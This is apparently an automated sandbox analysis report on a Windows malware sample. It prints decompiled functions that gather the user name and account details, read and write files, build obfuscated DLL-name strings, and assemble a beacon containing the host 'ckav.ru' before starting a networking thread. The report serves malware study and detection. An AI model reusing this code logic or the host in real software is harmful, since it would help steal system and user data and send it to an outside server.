Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				WCHAR* _v8;
				long _v12;
				void** _v16;
				WCHAR* _v20;
				long _v24;
				long _v28;
				union _SID_NAME_USE _v32;
				intOrPtr* _t25;
				WCHAR* _t27;
				WCHAR* _t30;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t40;
				WCHAR* _t41;
				long _t44;
				intOrPtr* _t45;
				WCHAR* _t46;
				void* _t48;
				WCHAR* _t49;
				WCHAR* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
									_t67 = _t41;
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062ec
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wmemset$AccountErrorInformationLastLookupToken
String ID: IDA$IDA
API String ID: 3235442692-2020647798
Opcode ID: a2d549680fa783d8f50565339607b910b7971ef0e93276aec8fdc92f86c0445c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: a2d549680fa783d8f50565339607b910b7971ef0e93276aec8fdc92f86c0445c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60);
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10; // executed
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					_t31 = E004063B2(0, _t53, _t79); // executed
					E004058D4( *0x49fde0, _t31); // executed
					_t33 = E004060BD(_t79); // executed
					E004058D4( *0x49fde0, _t33); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e92
0x00412e9e
0x00412ea3
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}

0x00406340
0x00406345
0x00406373
0x00406373
0x00406347
0x0040634f
0x00406354
0x00406357
0x0040635c
0x00406366
0x0040636d
0x00000000
0x00406368
0x00406368
0x00406368
0x00406366
0x0040637a

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 0041284A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041284A(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, int _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 2, 0xebb783d2, 0, 0);
				_t7 = SHRegSetPathW(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00412858
0x0041286c
0x0041286f

APIs

